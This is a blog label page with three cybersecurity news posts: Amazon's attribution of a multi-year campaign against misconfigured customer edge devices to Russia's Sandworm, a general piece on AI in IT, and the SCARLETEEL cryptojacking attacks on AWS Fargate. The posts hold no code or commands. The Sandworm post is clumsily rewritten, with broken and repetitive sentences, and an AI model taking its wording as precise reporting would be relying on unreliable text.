Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Cloud Device. Show all posts
Hacking Group
Amazon Cloud Cloud Defense Cloud Device Cyber Campaigns Cyber Security GRU Hacking Attack Hacking Group

Amazon Links Five-Year Cloud Cyber Campaign to Russia’s Sandworm Group

 

Amazon is talking about a hacking problem that has been going on for a long time. This problem was targeting customers who use cloud services in countries. Amazon says that a group called Sandworm, which is linked to Russias intelligence is behind this hacking. Amazons team that looks at threats found out that this hacking has been happening for five years. The hackers were looking for weaknesses in how customers set up their devices than trying to find problems with the software. They were exploiting these weaknesses to get into customer environments. 

Amazon and the customers were using cloud services. The hackers were targeting these cloud-connected environments. The hacking group Sandworm is the one that Amazon says is responsible, for this activity. The people at Amazon looked at this problem in December. Amazons chief information security officer, CJ Moses said that this is a change in how some groups try to get into important systems. CJ Moses said that these groups are not trying to get in by using software that has not been updated. 

Instead they are looking at devices that are connected to the cloud and are not set up correctly. These devices are how they get into the organizations they are trying to attack. CJ Moses and the people, at Amazon think that this is a way that state-sponsored actors are trying to get into critical infrastructure. The devices that are connected to the cloud are the way that these actors get into the systems they are trying to attack. 

The cyberattacks were different from others. The systems that were compromised were not old or missing security updates. The people who did the attack found problems with the equipment that helps connect things, like gateways and devices that sit at the edge of networks. These devices had been set up incorrectly by the customers who used them. This equipment is usually between the networks of a company and the cloud services they use outside. 

So it gave the attackers a way to get into the rest of the system without needing to find brand weaknesses or use very complicated bad software at the start. The attackers used these edge devices as a kind of bridge to get into the system. They were able to do this because the devices were not set up correctly by the customers. The cyberattacks were able to happen because of this mistake. It made it easier for the attackers to get into the system. The compromised systems, including the routing equipment and gateways were the key, to the attack. 

The bad people got into the system. They were able to get important information like passwords. Then they were able to move to different cloud services and the internal system. Amazon looked at this. They think that the bad people were able to hide what they were doing by making it look like normal activity on the network. This made it harder to catch them. The bad people used passwords and normal paths, on the network so they did not trip any alarms. This meant that the security people did not notice them because they were not doing anything that seemed out of the ordinary. 

The Sandworm activity was seen times over a few years with signs of it going back to at least 2021. The people behind this campaign were going after targets all around the world. They were especially interested in organizations that do important work like those that deal with critical infrastructure. Amazon found out that the people behind the Sandworm activity were really focused on energy companies, in North America and Europe. This shows that the Sandworm activity was a thoughtful and planned operation and that is what makes it so serious the Sandworm activity is a big deal. 

Security specialists looked at the results. They think this is part of a bigger pattern with advanced threat actors. What is happening is that people are taking advantage of mistakes in how thingsre set up rather than looking for things that need to be updated. As organizations start to use hybrid and cloud-based systems this is becoming a bigger problem. Even people who are very good at IT can miss mistakes in how thingsre set up and this can leave them open, to attacks all the time. Security specialists and these advanced threat actors know that they can take advantage of these mistakes without setting off the warnings that something is wrong. 

Advanced threat actors are using these mistakes to get in. Amazons disclosure is a warning that having cloud security is not just about doing the usual updates. Companies that use cloud and hybrid environments for work need to do more. They need to make sure everything is set up correctly always check for problems with devices that are connected to the internet and limit who can get into the system. These things are very important, for security. Amazons cloud security is an example of this. Cloud security requires a lot of work to keep it safe. 

In a separate disclosure, Amazon also acknowledged detecting attempts by North Korean operators to conduct large-scale cyber activity, though this was unrelated to the Sandworm campaign. The company later clarified that the Russian-linked operation targeted customer-managed devices hosted on AWS rather than Amazon’s own infrastructure, and that the activity represented sustained targeting over several years rather than uninterrupted access.
Read more »
IoT devices
AI Policy Artificial Intelligence Cloud Device Cloud Platform Cyber Security Information Technology IoT devices

AI's Swift Impact on the IT Industry

The integration of Artificial Intelligence (AI) in the Information Technology (IT) industry is poised to bring about rapid and profound changes. As businesses seek to stay ahead in an increasingly competitive landscape, the adoption of AI technologies promises to revolutionize how IT operations are managed and drive innovation at an unprecedented pace.

According to a recent report by ZDNet, the impact of AI on the IT industry is set to be both swift and far-reaching. The article highlights how AI-powered solutions are automating tasks that were once time-consuming and labour-intensive. This shift allows IT professionals to focus on higher-level strategic initiatives, enhancing productivity and efficiency across the board.

IDC, a renowned market intelligence firm, supports this view in its latest research. The report underscores that AI technologies are becoming indispensable tools for businesses seeking to streamline operations and gain a competitive edge. IDC predicts a significant surge in AI adoption across various sectors, underlining the transformative potential of this technology.

Furthermore, the 2023 Enterprise IoT and OT Threat Report by Zscaler ThreatLabz sheds light on the crucial role AI plays in securing the expanding landscape of enterprise IoT and OT devices. As the Internet of Things continues to grow, so do the associated security risks. AI-powered threat detection and response systems are proving to be instrumental in safeguarding networks against evolving cyber threats.

The convergence of AI and IT is driving innovation across domains such as cloud computing, cybersecurity, and data analytics. Cloud platforms are leveraging AI to optimize resource allocation and enhance performance, while cybersecurity solutions are using AI to detect and respond to threats in real-time.

Organizational structures are changing as a result of AI's incorporation into the IT sector. Organizations are reaching new heights in terms of productivity, security, and innovation thanks to the quick adoption of AI technology. Enterprises adopting AI will have an advantage in navigating the opportunities and difficulties presented by the changing IT ecosystem in the future. The revolutionary potential of artificial intelligence is undoubtedly linked to the future of IT.

Read more »
Security
Amazon Web Services attackers AWS Cloud Device Cyber Attacks Data Data Safety data security Hackers Safety Scammers Scams Security

SCARLETEEL Hackers Target AWS Fargate in Latest Cryptojacking Campaign

 

An continuing sophisticated attack effort known as SCARLETEEL continues to target cloud settings, with threat actors currently focusing on Amazon Web Services (AWS) Fargate.

According to a new report from Sysdig security researcher Alessandro Brucato, "Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture."

The cybersecurity firm originally revealed SCARLETEEL in February 2023, describing a complex attack chain that resulted in the theft of confidential information from AWS infrastructure and the installation of bitcoin miners to illicitly profit from the resources of the compromised systems.

However, Sysdig told The Hacker News that it "could be someone copying their methodology and attack patterns." Cado Security's follow-up investigation revealed possible connections to the well-known cryptojacking outfit TeamTNT.

The threat actor's recent action is a continuation of his propensity to target AWS accounts by taking advantage of weak public-facing web apps in order to achieve persistence, steal intellectual property, and maybe earn $4,000 per day utilizing bitcoin miners.

According to Brucato, "The actor discovered and exploited a flaw in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then use it however they wanted."

The rival starts by taking advantage of JupyterLab notebook containers that are set up in a Kubernetes cluster. Using this initial foothold, the adversary conducts reconnaissance on the target network and gathers AWS credentials to gain further access to the victim's environment.

The installation of the AWS command-line tool and the Pacu exploitation framework for later exploitation come next. The assault is notable for using a variety of shell scripts, some of which target AWS Fargate compute engine instances, to retrieve AWS credentials.

"The attacker was observed using the AWS client to connect to Russian systems which are compatible with the S3 protocol," Brucato said, adding the SCARLETEEL actors used stealthy techniques to ensure that data exfiltration events are not captured in CloudTrail logs.

Other actions done by the attacker include the employment of a DDoS botnet virus known as Pandora and the Kubernetes Penetration Testing tool Peirates, all of which point to continued efforts on the side of the actor to monetize the host.

"The SCARLETEEL actors continue to operate against targets in the cloud, including AWS and Kubernetes," Brucato said. 

"Their preferred method of entry is exploitation of open compute services and vulnerable applications. There is a continued focus on monetary gain via crypto mining, but [...] intellectual property is still a priority."



Read more »
Subscribe to: Comments (Atom)